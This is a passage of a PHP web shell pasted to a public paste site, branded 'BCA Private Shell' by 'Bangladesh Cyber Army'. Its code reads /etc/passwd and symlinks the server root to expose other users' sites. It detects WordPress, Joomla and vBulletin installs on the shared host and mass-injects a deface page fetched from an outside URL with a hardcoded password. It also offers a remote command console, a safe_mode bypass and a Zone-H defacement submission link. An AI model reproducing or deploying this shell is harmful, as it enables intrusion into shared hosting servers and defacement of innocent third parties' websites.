  750. <div class="tblbx'.$q.'" style="width:220px;" id="inj_domain'.$j.'">'.$domain.'</div>
  751. <div class="tblbx'.$q.'" style="width:160px;"><a id="injst'.$j.'" class="conf" href="'.$link.'bca/'.$sitez.'.txt" title="'.$j.'">'.ucfirst($sn[1]).'</a></div>
  752. <div class="tblbx'.$q.'" style="width:120px;" id="inj_status'.$j.'" title="On Idle...">Idle...</div>
  753. </div>';
  754. }
  755. $cnt = '<input type="text" style="display:none" id="sitecount" value="'.$j.'">';
  756. echo $nan.$cnt;
  757. }
  758. }
  759. die();
  760. }
  761. elseif($_POST['ac'] == "chkph2"){
  762. if(is_readable("/etc/passwd")){
  763. if(!is_dir("bca")){
  764. @mkdir('bca',0777);
  765. }
  766. if(!is_link("bca/root")){
  767. $sym = symlink("/","bca/root");
  768. if(!$sym){
  769. die("Symlink method failed.");
  770. }
  771. }
  772. $htaccss = "Options all
  773. DirectoryIndex Sux.html
  774. AddType text/plain .php
  775. AddHandler server-parsed .php
  776.  AddType text/plain .html
  777. AddHandler txt .html
  778. Require None
  779. Satisfy Any";
  780. file_put_contents("bca/.htaccess",$htaccss);
  781. $etc = file_get_contents("/etc/passwd");
  782. $etcz = explode("\n",$etc);
  783. $lol = explode("/",curPageURL());
  784. $link = str_replace(end($lol),"",curPageURL());
  785. @unlink("rootinject.tmp");
  786. $q = 2;
  787. $dmn = getDnamed();
  788. foreach($etcz as $etz){
  789. $etcc = explode(":",$etz);
  790. $dr = "bca/root/home/".$etcc[0]."/public_html/";
  791. $dan = chkSys($link.$dr);
  792. if($dan){
  793. if($q == 2){$q = 1;}else{$q = 2;}
  794. $domain = $dmn[$etcc[0]];
  795. if($domain){
  796. $domain = "<a id='inj_dom".$k."' href='http://".$domain."'>".$domain."</a>";
  797. }else{
  798. $domain = "<a id='inj_dom".$k."' href=''>...</a>";
  799. }
  800. $k += 1;
  801. $nant = '<div id="inj'.$k.'">
  802. <div class="tblbx'.$q.'" style="width:200px;cursor:pointer;background-color:#76BBEB;" id="injc'.$k.'"onClick="doToggle(\''.$k.'\');">'.$etcc[0].'<input style="display:none;" type="checkbox" id="injchk'.$k.'" checked></div>
  803. <div class="tblbx'.$q.'" style="width:220px;" id="inj_domain'.$k.'">'.$domain.'</div>
  804. <div class="tblbx'.$q.'" style="width:160px;"><a class="conf" href="'.$dan['link'].'">'.$dan['cms'].'</a></div>
  805. <div class="tblbx'.$q.'" style="width:120px;" id="inj_status'.$k.'">Idle...</div>
  806. </div>';
  807. file_put_contents("rootinject.tmp",$nant,FILE_APPEND);
  808. $nan .= $nant;
  809. }
  810. }
  811. $cnt = '<input type="text" style="display:none" id="sitecount" value="'.$k.'">';
  812. echo $nan.$cnt;
  813. }
  814. die();
  815. }
  816. elseif($_POST['ac'] == "inject"){
  817. error_reporting(0);
  818. $cms = strtolower($_POST['cms']);
  819. $cnf = $_POST['conf'];
  820. if(file_exists(md5($_POST['deface_page']))){
  821. $html = file_get_contents(md5($_POST['deface_page']));
  822. }else{
  823. $html = file_get_contents($_POST['deface_page']);
  824. file_put_contents(md5($_POST['deface_page']),$html);
  825. file_put_contents("bca.html",$html);
  826. }
  827. if(!is_dir("cookie")){
  828. @mkdir("cookie",0777);
  829. }
  830. switch($cms){
  831. case "wordpress":
  832. doXploitWP($cnf,$html,"uradhura123");
  833. break;
  834. case "joomla":
  835. doXploitJM($cnf,$html,"uradhura123");
  836. break;
  837. case "vbulletin":
  838. doXploitVB($cnf,$html);
  839. break;
  840. case "phpbb":
  841. break;
  842. case "ipb":
  843. break;
  844. case "mybb":
  845. break;
  846. case "oscommerce":
  847. break;
  848. case "smf":
  849. break;
  850. case "drupal":
  851. break;
  852. case "seditio":
  853. break;
  854. case "e107":
  855. break;
  856. }
  857. throwErr("Not Added");
  858. }
  859. elseif($_POST['ac'] == "ssh"){
  860. $ssh = exme($_POST['command']);
  861. die(nl2br($ssh));
  862. }
  863. elseif($_POST['ac'] == "phpinfo"){
  864. $php = phpinfo();
  865. die($php);
  866. }
  867. ;echo '<html>
  868. <title>BCA Private Shell</title>
  869. <head>
  870. <script src="http://code.jquery.com/jquery-latest.min.js"></script>
  871. </head>
  872. <body bgcolor="black" background="http://www.madtomatoe.com/wp-content/uploads/2010/11/matrix-animated-image.gif">
  873. <style>
  874. body{
  875. font-family: "courier new";
  876. background-color: black;
  877. font-size:80%;
  878. color: #28FE14;
  879. background-image: url("data:image/gif;base64,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");
  880. }
  881. #sysinfo{
  882. border: 1px solid #28FE14;
  883. position:fixed;
  884. padding:2px;
  885. top:1px;
  886. left:1px;
  887. background-color: black;
  888. font-size:12px;
  889. }
  890. #phpinfo{
  891. border: 1px solid #28FE14;
  892. position:fixed;
  893. padding:2px;
  894. top:1px;
  895. right:1px;
  896. background-color: black;
  897. font-size:12px;
  898. }
  899. #status{
  900. border: 1px solid #28FE14;
  901. position:fixed;
  902. padding:2px;
  903. bottom:1px;
  904. right:1px;
  905. background-color: black;
  906. font-size:12px;
  907. }
  908. #infobox{
  909. z-index:1;
  910. border: 1px solid white;
  911. margin-left:auto;
  912. margin-right:auto;
  913. margin-top:50px;
  914. width:600px;
  915. background-color: black;
  916. font-size:12px;
  917. }
  918. .infotitle{
  919. padding:4px;
  920. background-color: white;
  921. color: black;
  922. font-family: Thaoma;
  923. font-size:14px;
  924. }
  925. .infotxt{
  926. padding:5px;
  927. }
  928.  
  929. .sidebar{
  930. position:fixed;
  931. left:1px;
  932. top:30%;
  933. }
  934. .stitle{
  935. float:left;
  936. cursor:pointer;
  937. padding:7px;
  938. color:black;
  939. background-color: white;
  940. }
  941. .stitle:hover{
  942. color:red;
  943. }
  944. .smnu{
  945. display:none;
  946. background-color: black;
  947. padding:5px;
  948. border: 1px solid white;
  949. float:left;
  950. }
  951. a{
  952. color: #df5;
  953. text-decoration: none;
  954. }
  955. a:hover{
  956. color:white;
  957. }
  958. .copyright{
  959. position:fixed;
  960. bottom:1px;
  961. left:1px;
  962. padding:2px;
  963. }
  964. .logo{
  965. margin:auto;
  966. width:600px;
  967. height:600px;
  968. background-image: url("http://4.bp.blogspot.com/-DEFzMZtxffI/Tz11pJscP9I/AAAAAAAAAIQ/4UKKPprIg5U/s1600/jh3gj7.gif");
  969. }
  970. .filetable{
  971. margin-top:2px;
  972. width:740px;
  973. }
  974. .tblcnt{
  975. text-align: center;
  976. margin-left:2px;
  977. color:black;
  978. background-color: white;
  979. padding:3px;
  980. float:left;
  981. border: 1px solid white;
  982. }
  983. .tblbx1{
  984. height:12px;
  985. text-align: center;
  986. margin-left:2px;
  987. color:white;
  988. background-color: #333333;
  989. padding:3px;
  990. float:left;
  991. border: 1px solid #333333;
  992. }
  993. .tblbx2{
  994. height:12px;
  995. text-align: center;
  996. margin-left:2px;
  997. color:white;
  998. background-color: #444444;
  999. padding:3px;
  1000. float:left;
  1001. border: 1px solid #444444;
  1002. }
  1003.  
  1004. .tbl{
  1005. margin-top:100px;
  1006. padding-top:2px;
  1007. padding-bottom: 2px;
  1008. margin:auto;
  1009. width:742px;
  1010. border: 1px solid white;
  1011. }
  1012. .rbox{
  1013. float:left;
  1014. border: 1px solid #28FE14;
  1015. padding:10px;
  1016. }
  1017. .smit{
  1018. background-color: black;
  1019. color: #28FE14;
  1020. }
  1021. .sshbox{
  1022. display:none;
  1023. padding-left:7px;
  1024. width:600px;
  1025. height:400px;
  1026. margin: auto;
  1027. margin-top:80px;
  1028. -webkit-border-radius: 10px;
  1029. -moz-border-radius: 10px;
  1030. border-radius: 10px;
  1031. border:3px solid #FFF5F5;
  1032. background-color:#080500;
  1033. overflow:auto;
  1034. }
  1035. #sshcmd{
  1036. width:450px;
  1037. background-color: #080500;
  1038. color:#28FE14;
  1039. border:none;
  1040. }
  1041.  
  1042. </style>
  1043. <body>
  1044. <div class="logo" id="logo"></div>
  1045. <div id="sysinfo"><strong>OS:</strong> ';echo php_uname("s")." - ".php_uname("r")." /  ".php_uname("m");;echo '</div>
  1046.  
  1047. <div id="phpinfo"> ';
  1048. $srvsoft = explode(" ",$_SERVER['SERVER_SOFTWARE']);
  1049. echo $srvsoft[0];
  1050. echo " PHP ".phpversion();
  1051. if( ini_get('safe_mode') ){
  1052. echo " <font color='red'>Safe Mode On</font>";
  1053. }else{
  1054. echo " <font color='blue'>Safe Mode Off</font>";
  1055. }
  1056. ;echo '</div>
  1057.  
  1058. <div id="tbl" class="tbl" style="display:none;">
  1059. <div class="filetable">
  1060. <div class="tblcnt" style="width:220px;">Name</div>
  1061. <div class="tblcnt" style="width:80px;">Size</div>
  1062. <div class="tblcnt" style="width:100px;">Modify</div>
  1063. <div class="tblcnt" style="width:100px;">Owner</div>
  1064. <div class="tblcnt" style="width:100px;">Permission</div>
  1065. <div class="tblcnt" style="width:80px;">Action</div>
  1066. </div>
  1067. <div id="filest"></div>
  1068. <div style="clear:both;"></div>
  1069.  
  1070. </div>
  1071.  
  1072. <div id="inject" class="tbl" style="display:none;">
  1073. <div class="filetable">
  1074. <div class="tblcnt" style="width:200px; cursor:pointer;" onClick="doSlct();">User</div>
  1075. <div class="tblcnt" style="width:220px;">Sitename</div>
  1076. <div class="tblcnt" style="width:160px;">CMS</div>
  1077. <div class="tblcnt" style="width:120px;">Status</div>
  1078. </div>
  1079. <div id="injtbl"></div>
  1080. <div style="clear:both;"></div>
  1081.  
  1082. </div>
  1083.  
  1084. <div id="infobox" style="display:none;"><div class="infotitle"><a href="" onclick="$(\'#infobox\').hide();return false;" style="color:black;">[-]</a> <span id="infotitle">Information</span></div><div class="infotxt" id="infotxt"></div></div>
  1085. <script>
  1086.  
  1087. var sidebar = false;
  1088. var sidebar2 = false;
  1089. function sidebarz(){
  1090. $(\'#logo\').hide();
  1091. if(sidebar){
  1092. $(\'#smnu\').hide();
  1093. sidebar = false;
  1094. }else{
  1095. $(\'#smnu\').show();
  1096. sidebar = true;
  1097. }
  1098. }
  1099. function sidebarz2(){
  1100. if(sidebar2){
  1101. $(\'#smnu2\').hide();
  1102. sidebar2 = false;
  1103. }else{
  1104. $(\'#smnu2\').show();
  1105. sidebar2 = true;
  1106. }
  1107. }
  1108.  
  1109. function filebrs(val){
  1110. hideAll();
  1111. $(\'#status\').html(\'Status: Requesting...\');
  1112. $.post("", { ac: "browse", path: val},
  1113. function(data) {
  1114. $(\'#tbl\').show();
  1115. $(\'#status\').html(\'Status: Completed (:\');
  1116. $(\'#filest\').html(data);
  1117. });
  1118. }
  1119. function doUpdt(val){
  1120. var refreshId = setInterval(function() {
  1121.      $("#injtbl").load(\'rootinject.tmp\');
  1122.   }, 5000);
  1123.   $.ajaxSetup({ cache: false });
  1124.  
  1125. hideAll();
  1126. $(\'#inject\').show();
  1127. $(\'#status\').html(\'Status: Requesting...\');
  1128. $.post("", { ac: val},
  1129. function(data) {
  1130. refreshId = "";
  1131. $(\'#sidebar2\').show();
  1132. $(\'#status\').html(\'Status: Completed (:\');
  1133. $(\'#injtbl\').html(data);
  1134. });
  1135.  
  1136. }
  1137.  
  1138. function hideAll(){
  1139. k1 = 0;
  1140. k2 = 0;
  1141. $(\'#sidebar2\').hide();
  1142. $(\'#tbl\').hide();
  1143. $(\'#inject\').hide();
  1144. $(\'#infobox\').hide();
  1145. $(\'#sshbox\').hide();
  1146. }
  1147.  
  1148. function doReq(val){
  1149. hideAll();
  1150. $(\'#inject\').show();
  1151. $(\'#status\').html(\'Status: Requesting...\');
  1152. $.post("", { ac: val},
  1153. function(data) {
  1154. $(\'#sidebar2\').show();
  1155. $(\'#status\').html(\'Status: Completed (:\');
  1156. $(\'#injtbl\').html(data);
  1157. });
  1158. }
  1159.  
  1160. function doReq2(val){
  1161. hideAll();
  1162. $(\'#status\').html(\'Status: Requesting...\');
  1163. $.post("", { ac: val},
  1164. function(data) {
  1165. $(\'#infobox\').show();
  1166. $(\'#status\').html(\'Status: Completed (:\');
  1167. $(\'#infotxt\').html(data);
  1168. });
  1169. }
  1170.  
  1171. //Js Multi thread post request by Elo (:
  1172. var k1 = 1; var k2 = 0; var req_limit = 9;
  1173. function doInject(){
  1174. var i = 0; var j = 0;
  1175. $(\'.conf\').each(function(){
  1176. i += 1;
  1177. var id = $(this).attr(\'title\');
  1178.  
  1179. if(id > k1){
  1180. j += 1; k1 += 1;
  1181. var link = $(this).attr(\'href\');
  1182.  
  1183. var domain = $(\'#inj_dom\' + id).html();
  1184. var cms = $(this).html();
  1185. doPost2(link,cms,id,domain);
  1186. }
  1187. if(j > req_limit){return false;}
  1188.  
  1189.  
  1190. });
  1191. }
  1192.  
  1193.  
  1194.  
  1195. function doPost2(link,cmz,id,dmn){
  1196. if($(\'#injchk\'+id).is(\':checked\')){
  1197. $(\'#inj_status\' + id).html(\'Injecting...\');
  1198. $.ajax({
  1199.  url: "",
  1200.  type: "POST",
  1201.  timeout: 60000,
  1202.  data: {ac: "inject", conf: link, domain: dmn, cms: cmz, ignore_def: $(\'#ignore_def:checked\').val(), n404_php: $(\'#404_php:checked\').val(), nindex_php: $(\'#index_php:checked\').val(), nhome_php: $(\'#home_php:checked\').val(), narchive_php: $(\'#archive_php:checked\').val(), ncomment_php: $(\'#comment_php:checked\').val(), com_install: $(\'#use_com:checked\').val(), deface_page: $(\'#deface_page\').val()},
  1203.  dataType: "text"
  1204. }).done(function(msg) {
  1205.  
  1206. k2 += 1;
  1207.  
  1208. $(\'#inj_status\' + id).html(\'Parse Error\');
  1209. $(\'#inj_status\' + id).css({"background-color" : "red", "color" : "white"});
  1210. var res_data = JSON.parse(msg);
  1211.  
  1212. if(res_data.status == "success"){
  1213. $(\'#inj_domain\' + id).html(\'<a class="injwork" href="\' + res_data.site + \'">\' + res_data.site + \'</a>\');
  1214. $(\'#inj_status\' + id).css({"background-color" : "green", "color" : "white"});
  1215. $(\'#inj_status\' + id).html(\'Success\');
  1216. $(\'#injst\' + id).removeClass("conf");
  1217.  
  1218. }
  1219. else{
  1220. if(res_data.status == "error"){
  1221. $(\'#inj_status\' + id).css({"background-color" : "red", "color" : "white"});
  1222. $(\'#inj_status\' + id).html(res_data.msg);
  1223. $(\'#inj_status\' + id).addClass("injerror");
  1224. $(\'#injst\' + id).removeClass("conf");
  1225. }else{
  1226. $(\'#inj_status\' + id).addClass("injerror");
  1227. $(\'#inj_status\' + id).html(\'Unknown\');
  1228. $(\'#injst\' + id).removeClass("conf");
  1229. }
  1230. }
  1231. updateInjSts(k2);
  1232. if(k1 == k2){doInject();}
  1233. }).fail(function(jqXHR, textStatus) {
  1234. k2 += 1;
  1235. $(\'#inj_status\' + id).css({"background-color" : "black", "color" : "white"});
  1236. $(\'#inj_status\' + id).html(\'Timeout\');
  1237. updateInjSts(k2);
  1238. if(k1 == k2){doInject();}
  1239. });
  1240.  
  1241. }else{
  1242. k2 += 1;
  1243. updateInjSts(k2);
  1244. if(k1 == k2){doInject();}
  1245. }
  1246. }
  1247. //Js Multi thread post request by Elo (:
  1248. function updateInjSts(k){
  1249. var tc = $(\'#sitecount\').val();
  1250. if(tc > k){
  1251. $(\'#status\').html("Status: " + k + "/" + tc + " Injected");
  1252. }else{
  1253. $(\'#status\').html("Status: Injection Complete (:");
  1254. }
  1255. }
  1256.  
  1257. function rmvErr(){
  1258. $(\'.injerror\').each(function(){
  1259. var nano = $(this).parent();
  1260. $(nano).remove();
  1261. });
  1262. }
  1263.  
  1264. function rmvSlct(){
  1265. $(\'.conf\').each(function(){
  1266. var id = $(this).attr(\'title\');
  1267. if($(\'#injchk\'+id).is(\':checked\')){
  1268. $(\'#inj\' + id).remove();
  1269. }
  1270. });
  1271. }
  1272.  
  1273. function retryTimeout(){
  1274. k1 = 1; k2 = 0;
  1275. doInject();
  1276. }
  1277.  
  1278. function doSlct(){
  1279. $(\'.conf\').each(function(){
  1280. var id = $(this).attr(\'title\');
  1281. doToggle(id);
  1282. });
  1283. }
  1284.  
  1285. function doToggle(dd){
  1286. if($(\'#injchk\'+dd).is(\':checked\')){
  1287. $(\'#injc\'+dd).css(\'background-color\',\'red\');
  1288. $(\'#injchk\'+dd).attr(\'checked\',false);
  1289. }else{
  1290. $(\'#injc\'+dd).css(\'background-color\',\'#76BBEB\');
  1291. $(\'#injchk\'+dd).attr(\'checked\',true);
  1292. }
  1293. }
  1294.  
  1295. function doSSH(){
  1296. $(\'#status\').html("Status: Requesting...");
  1297. var cmd = $(\'#sshcmd\').val();
  1298. $(\'#sshcmd\').val("");
  1299. $.post("", { ac: "ssh",command: cmd},
  1300. function(data) {
  1301. $(\'#sshoutput\').append("[root@bca~]# <br />"+data+"<br />");
  1302. $(\'#status\').html("Status: Done.");
  1303. });
  1304. }
  1305. </script>
  1306.  
  1307. <div class="sshbox" id="sshbox">
  1308. <br />
  1309. <div id="sshoutput"></div>
  1310. [root@bca~]# <input onkeydown="if (event.keyCode == 13) doSSH();" type="text" id="sshcmd">
  1311. </div>
  1312.  
  1313. <div id="sidebar" class="sidebar">
  1314.  
  1315. <div class="smnu" id="smnu" class="smnu">
  1316. &raquo; <a href="" onClick="$(\'#infobox\').show();$(\'#infotitle\').html(\'Security Information\');doReq2(\'secinfo\');return false;">Security Vulnerability</a></br>
  1317. &raquo; <a href="" onClick="$(\'#infobox\').show();$(\'#infotitle\').html(\'System Information\');doReq2(\'sysinfo\');return false;">System Information</a></br>
  1318. &raquo; <a href="" onClick="$(\'#infotitle\').html(\'PHP Info\');doReq2(\'phpinfo\');return false;">PHP Info</a></br>
  1319. &raquo; <a href="" onClick="filebrs(\'\'); return false;">File Browser</a></br>
  1320. &raquo; <a href="" onClick="$(\'#infotitle\').html(\'Scanned Domains\');doReq2(\'chknamed\');return false;">Get All Domains</a></br>
  1321. &raquo; <a href="" onClick="doReq(\'chkph\');return false;">CMS Detector [Simple]</a></br>
  1322. &raquo; <a href="" onClick="$(\'#inject\').show();doUpdt(\'chkph2\');return false;">CMS Detector [root]</a></br>
  1323. &raquo; <a href="" onClick="doReq2(\'safebypass\');return false;">Bypass PHP Safe_Mode</a></br>
  1324. &raquo; <a href="">Network Tools</a></br>
  1325. &raquo; <a href="">SQL Manager(Coming Soon)</a></br>
  1326. &raquo; <a href="" onClick="hideAll(); $(\'#sshbox\').show(); return false;">Command Console</a></br>
  1327. &raquo; <a href="?ac=killme">Kill Me</a></br>
  1328.  
  1329. </div>
  1330. <div class="stitle" onClick="sidebarz();">O</br>P</br>T</br>I</br>O</br>N</br>S</div>
  1331. </div>
  1332.  
  1333. <div id="sidebar2" class="sidebar" style="display:none;right:1px;left:auto;">
  1334. <div class="smnu" style="float:right;" id="smnu2" class="smnu">
  1335. <div id="injmain">
  1336. &raquo; <a href="" onClick="doInject(); return false;">Start Injecting</a></br>
  1337. &raquo; <a href="" onClick="">Export</a></br>
  1338. &raquo; <a href="" onClick="rmvErr(); return false;">Remove Error</a></br>
  1339. &raquo; <a href="" onClick="rmvSlct(); return false;">Remove Selected</a></br>
  1340. &raquo; <a href="" onClick="retryTimeout(); return false;">Retry timeout</a></br>
  1341. &raquo; <a href="" onClick="alert(\'Do It Manually :p\'); return false;">Submit to Zone-H</a></br>
  1342. &raquo; <a href="" onClick="$(\'#injmain\').hide(); $(\'#inj2nd\').show(); return false;">Settings</a></br>
  1343. </div>
  1344. <div id="inj2nd" style="display:none;">
  1345. <div class="rbox">
  1346.  
  1347. <div style="clear:both;"></div>
  1348. <center><u>WordPress</u></center><br>
  1349. <input type="checkbox" name="404_php" id="404_php" checked>404.php<br />
  1350. <input type="checkbox" name="archive_php" id="archive_php" checked>archive.php<br />
  1351. <input type="checkbox" name="index_php" id="index_php" checked>index.php<br />
  1352. <input type="checkbox" name="home_php" id="home_php" checked>home.php<br />
  1353. <input type="checkbox" name="comment_php" id="comment_php" checked>comment.php<br /><br /><br />
  1354. </div>
  1355.  
  1356. <div class="rbox">
  1357. <center><u>Joomla</u></center><br>
  1358. <input type="checkbox" name="use_com" id="use_com" checked>Use Com Installer<br />
  1359. <input type="checkbox" id="ignore_def">Ignore Default Templete<br />
  1360. </div>
  1361.  
  1362. <div class="rbox">
  1363. <center><u>Default</u></center><br>
  1364. Req/s: <input type="text" class="smit" value="10" onChange="req_limit = $(this).val();"><br />
  1365. Deface Page Link: <input type="text" class="smit" id="deface_page" value="http://naramamandiri.com/index.html"><br /><br />
  1366. </div>
  1367.  
  1368. <div style="clear:both;"></div><br />
  1369. <a href="" onClick="$(\'#injmain\').show(); $(\'#inj2nd\').hide(); return false;">Go Back</a>
  1370. </div>
  1371.  
  1372.  
  1373. </div>
  1374. <div class="stitle" style="float:right;" onClick="sidebarz2();">I</br>N</br>J</br>E</br>C</br>T</br>O</br>R</div>
  1375. </div>
  1376.  
  1377. <div style="clear:both;"></div>
  1378.  
  1379. <div id="status">Status: Idle...</div>
  1380. <div class="copyright">Copyright &copy; <a href=""><font color="red">Bangladesh Cyber Army</font></a></div>
  1381. </body>
  1382. </html>';
  1383. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!